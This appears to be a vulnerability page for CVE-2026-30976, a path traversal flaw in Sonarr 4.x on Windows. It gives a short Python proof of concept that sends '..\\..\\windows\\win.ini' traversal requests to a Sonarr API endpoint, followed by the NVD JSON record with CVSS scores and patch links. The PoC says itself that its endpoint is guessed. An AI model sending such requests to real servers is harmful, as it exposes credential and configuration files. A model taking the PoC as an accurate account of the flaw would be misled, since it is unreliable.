CVE-2026-30976

import requests # Target URL (Sonarr instance) target_url = "http://<target-ip>:8989/api/v3/diskSpace?path=../../.." # Note: The exact vulnerable endpoint might vary based on specific API implementation. # This PoC demonstrates the concept of path traversal to read files. # In a real scenario, the attacker would manipulate the 'path' or similar parameter. # Example payload to read Windows win.ini file # Usually Sonarr runs on Windows as a service. payload = "C:\\Windows\\win.ini" # Constructing a hypothetical malicious request # Assuming an endpoint like /api/file exists or parameters are injectable vuln_endpoint = "http://<target-ip>:8989/api/v3/rootfolder" params = { # Attempting to traverse out of the application root "path": "..\\..\\..\\..\\windows\\win.ini" } try: response = requests.get(vuln_endpoint, params=params) if response.status_code == 200: print("[+] Potential vulnerability confirmed!") print("Response content:") print(response.text) else: print("[-] Exploit failed or endpoint not found.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-30976", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:41.623", "lastModified": "2026-04-09T19:44:38.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sonarr is a PVR for Usenet and BitTorrent users. In versions on the 4.x branch prior to 4.0.17.2950, an unauthenticated remote attacker can potentially read any file readable by the Sonarr process. These include application configuration files (containing API keys and database credentials), Windows system files, and any user-accessible files on the same drive This issue only impacts Windows systems; macOS and Linux are unaffected. Files returned from the API were not limited to the directory on disk they were intended to be served from. This problem has been patched in 4.0.17.2950 in the nightly/develop branch or 4.0.17.2952 for stable/main releases. It's possible to work around the issue by only hosting Sonarr on a secure internal network and accessing it via VPN, Tailscale or similar solution outside that network."}, {"lang": "es", "value": "Sonarr es un PVR para usuarios de Usenet y BitTorrent. En versiones de la rama 4.x anteriores a la 4.0.17.2950, un atacante remoto no autenticado puede leer potencialmente cualquier archivo legible por el proceso de Sonarr. Estos incluyen archivos de configuración de la aplicación (que contienen claves de API y credenciales de base de datos), archivos del sistema de Windows y cualquier archivo accesible por el usuario en la misma unidad. Este problema solo afecta a los sistemas Windows; macOS y Linux no se ven afectados. Los archivos devueltos desde la API no estaban limitados al directorio en disco desde el que se suponía que debían servirse. Este problema ha sido parcheado en la versión 4.0.17.2950 en la rama nightly/develop o en la 4.0.17.2952 para las versiones stable/main. Es posible solucionar el problema alojando Sonarr únicamente en una red interna segura y accediéndolo a través de VPN, Tailscale o una solución similar fuera de esa red."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sonarr:sonarr:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0.741", "versionEndExcluding": "4.0.17.2950", "matchCriteriaId": "15A94C78-5072-4BB2-9E51-622ECBB2650B"}]}]}], "references": [{"url": "https://github.com/Sonarr/Sonarr/releases/tag/v4.0.17.2950", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Sonarr/Sonarr/releases/tag/v4.0.17.2952", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Sonarr/Sonarr/security/advisories/GHSA-h393-v5hm-6h8f", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}